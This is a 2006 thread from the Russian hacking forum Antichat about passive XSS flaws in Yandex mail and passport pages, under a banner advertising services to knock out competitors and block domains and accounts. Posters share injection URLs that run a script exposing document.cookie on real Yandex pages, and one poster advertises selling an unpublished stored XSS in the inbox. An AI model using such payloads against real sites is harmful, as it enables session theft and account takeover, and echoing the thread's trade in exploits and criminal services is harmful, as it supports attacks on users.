Форум АНТИЧАТ - mail.yandex.ru passive xss

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
mail.yandex.ru passive xss

Опции темы

Поиск в этой теме

Опции просмотра

mail.yandex.ru passive xss

05.11.2006, 05:36

vectorg

Постоянный

Регистрация: 07.08.2005

Сообщений: 386

Провел на форуме:
3212607

Репутация: 454

mail.yandex.ru passive xss

Вот, наткнулся... Т.к. пассивная, выкладываю сюда.
Совершенно ничего не фильтруется, вообщем good

Цитата:

-http://mail.yandex.ru/colabook_formaddp?name="><script>alert(document.co okie)</script>

+ один товарищ тут продает нечто подобное.

З.Ы. Почему бы не закрепить yandex и rambler в этом разделе, т.к. это уже сделано с mail.ru?

05.11.2006, 12:56

vectorg

Постоянный

Регистрация: 07.08.2005

Сообщений: 386

Провел на форуме:
3212607

Репутация: 454

Это уже на ваше усмотрение - хотите, переносите...
Выложил сюда, только из-за того, что это продается.

05.11.2006, 14:10

Mobile

Регистрация: 18.02.2006

Сообщений: 1,090

Провел на форуме:
6489333

Репутация: 1564

Отправить сообщение для Mobile с помощью ICQ

Надо было в паблик выложить, испортить тому барыге бизнес

08.11.2006, 11:18

~~Elekt~~

Banned

Регистрация: 05.12.2005

Сообщений: 982

Провел на форуме:
4839935

Репутация: 1202

Отправить сообщение для Elekt с помощью ICQ

=) хехе

08.11.2006, 13:14

=Be$=

Постоянный

Регистрация: 21.01.2006

Сообщений: 310

Провел на форуме:
1675027

Репутация: 237

Отправить сообщение для =Be$= с помощью ICQ

Как я помню он ее за 25уе продовал)))

11.11.2006, 21:46

Pionep

Новичок

Регистрация: 04.11.2006

Сообщений: 3

Провел на форуме:
33900

Репутация: 0

Цитата:

Сообщение от VectorG

один товарищ тут продает нечто подобное.

Продаваемая мною бага НЕ ИЗВЕСТНА НИКОМУ!
С выше написанной уязвимостью не имеет никакой связи.
Работает в другом направлении.

+ к этому скрипт, приготовленный для жертвы, будет выполняться каждый раз при заходе на страницу входящих сообщений.

С учётом того, что наконец пройдена проверка Гарантом, ПОКУПАЕМ!

11.11.2006, 23:07

Pionep

Новичок

Регистрация: 04.11.2006

Сообщений: 3

Провел на форуме:
33900

Репутация: 0

Как работает выше написанная бага?
В двух проверенных браузерах, "><script>alert(document.cookie)</script> аккуратно распечатывается в форме

11.11.2006, 23:18

Ksander

Постоянный

Регистрация: 21.06.2006

Сообщений: 931

Провел на форуме:
4836047

Репутация: 930

Наверно уже прикрыли, не пашет ни на ie, ни в myie.

23.12.2006, 23:44

_Great_

Флудер

Регистрация: 27.12.2005

Сообщений: 2,372

Провел на форуме:
5339610

Репутация: 4360

Отправить сообщение для _Great_ с помощью ICQ

IE:

Код:

http://passport.yandex.ru/passport?mode=register&ncrnd=&step=one&confirmed=yes&idkey=&filled=yes&login=qwerty%22%20style='background:url(javascript:alert(document.cookie))'

правда глюки есть некоторые%)

#10

28.12.2006, 02:39

MyNick

Познающий

Регистрация: 18.09.2006

Сообщений: 40

Провел на форуме:
43545

Репутация: 3

Ребята, короче вот http://ifolder.ru/735692 и вот http://ifolder.ru/735710 потом скажите мне пожалуста что вы об этом думаете !??

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
IPB 2.1.7 passive XSS	degeneration x	Форумы	20	24.02.2007 00:02
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25
Passive Xss на www.tgu.ru (почтовик)	_kREveDKo_	Уязвимости	0	31.05.2006 00:09
XSS на Yandex.RU	Gang100	Уязвимости	19	09.04.2006 16:42
Xss на yandex.ru	Pridu_ROCK	Уязвимости	1	04.03.2006 01:08

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход